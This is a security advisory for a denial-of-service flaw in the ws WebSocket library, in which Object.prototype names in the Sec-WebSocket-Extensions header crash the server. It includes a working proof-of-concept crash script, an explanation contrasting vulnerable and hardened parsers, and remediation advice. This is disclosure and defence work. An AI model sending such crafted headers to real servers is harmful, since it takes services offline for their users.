    Severity: high

    Denial of Service

    ws

    Overview

    Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.

    Proof of concept

    const WebSocket = require('ws');
    const net = require('net');
    
    // Start a ws server, then open a raw TCP connection to it and send an
    // upgrade request whose Sec-WebSocket-Extensions value is an
    // Object.prototype property name. Affected versions throw while parsing
    // the header and the server process crashes.
    const wss = new WebSocket.Server({ port: 3000 }, function () {
      const payload = 'constructor';  // or ',;constructor'
    
      const request = [
        'GET / HTTP/1.1',
        'Connection: Upgrade',
        'Sec-WebSocket-Key: test',
        'Sec-WebSocket-Version: 8',
        `Sec-WebSocket-Extensions: ${payload}`,
        'Upgrade: websocket',
        '\r\n'  // blank line terminating the header block
      ].join('\r\n');
    
      const socket = net.connect(3000, function () {
        socket.resume();
        socket.write(request);
      });
    });
    
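    The following is an added example, not code from ws itself: a simplified Sec-WebSocket-Extensions parser written two ways. The first stores extensions and parameters in plain objects, so a name such as constructor (or a parameter such as toString) collides with a property inherited from Object.prototype and the parser throws; the second uses null-prototype objects and treats those names as ordinary keys, and a small handshake wrapper converts any remaining parse error into a 400 for that client instead of an uncaught exception. The grammar handled is a subset of RFC 6455 section 9.1 (comma-separated extensions, semicolon-separated key or key=value parameters); the function names are this example's own.

```javascript
// Added example, not ws's own code: a simplified Sec-WebSocket-Extensions
// parser that shows why Object.prototype property names crash a parser
// keyed on a plain object, next to the null-prototype version that treats
// them as ordinary names. The grammar is a subset of RFC 6455 section 9.1:
// comma-separated extensions, each followed by semicolon-separated
// "key" or "key=value" parameters. Function names are this example's own.

// Split the header into [{ name, params: [[key, value], ...] }].
// Blank items are skipped, so ",;constructor" (the advisory's second
// payload) still produces an extension named "constructor".
function tokenize(header) {
  const out = [];
  for (const item of header.split(',')) {
    const parts = item.split(';').map((s) => s.trim()).filter(Boolean);
    if (parts.length === 0) continue;
    const [name, ...rawParams] = parts;
    const params = rawParams.map((p) => {
      const eq = p.indexOf('=');
      return eq === -1
        ? [p, true]
        : [p.slice(0, eq).trim(), p.slice(eq + 1).trim()];
    });
    out.push({ name, params });
  }
  return out;
}

// Vulnerable pattern: {} inherits from Object.prototype, so
// extensions['constructor'] is already the Object function before anything
// is stored. The truthiness check skips initialisation and the following
// .push() call throws a TypeError. A parameter named "constructor" or
// "toString" trips the duplicate check the same way.
function parseNaive(header) {
  const extensions = {};
  for (const { name, params } of tokenize(header)) {
    if (!extensions[name]) extensions[name] = [];
    const paramObj = {};
    for (const [key, value] of params) {
      if (paramObj[key] !== undefined) {
        throw new SyntaxError(`duplicate parameter "${key}"`);
      }
      paramObj[key] = value;
    }
    extensions[name].push(paramObj);
  }
  return extensions;
}

// Hardened pattern: Object.create(null) has no prototype chain, so `in`
// and property reads see only keys this parser stored. Even "__proto__"
// is just a normal own property on such an object.
function parseHardened(header) {
  const extensions = Object.create(null);
  for (const { name, params } of tokenize(header)) {
    if (!(name in extensions)) extensions[name] = [];
    const paramObj = Object.create(null);
    for (const [key, value] of params) {
      if (key in paramObj) {
        throw new SyntaxError(`duplicate parameter "${key}"`);
      }
      paramObj[key] = value;
    }
    extensions[name].push(paramObj);
  }
  return extensions;
}

// Handshake step that turns any remaining parse error into a 400 for
// that one client, so a malformed header can never become an uncaught
// exception that takes the whole process down.
function negotiateExtensions(headerValue) {
  try {
    return { status: 101, extensions: parseHardened(headerValue || '') };
  } catch (err) {
    return { status: 400, error: err.message };
  }
}
```

    Run with the advisory's payloads: parseNaive('constructor') throws a TypeError (the crash), while parseHardened('constructor') returns an object with one own key named constructor. The same null-prototype rule applies to any map keyed by attacker-controlled strings, which is why a Map, or a plain object created with Object.create(null), is the safer default for header and query-string parsers.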

    Remediation

    Update to version 3.3.1 or later.


    Advisory timeline

    1. Published: Advisory published, Nov 8th, 2017
    2. Reported: Initial report by Nick Starke, Ryan Knell, Nov 8th, 2017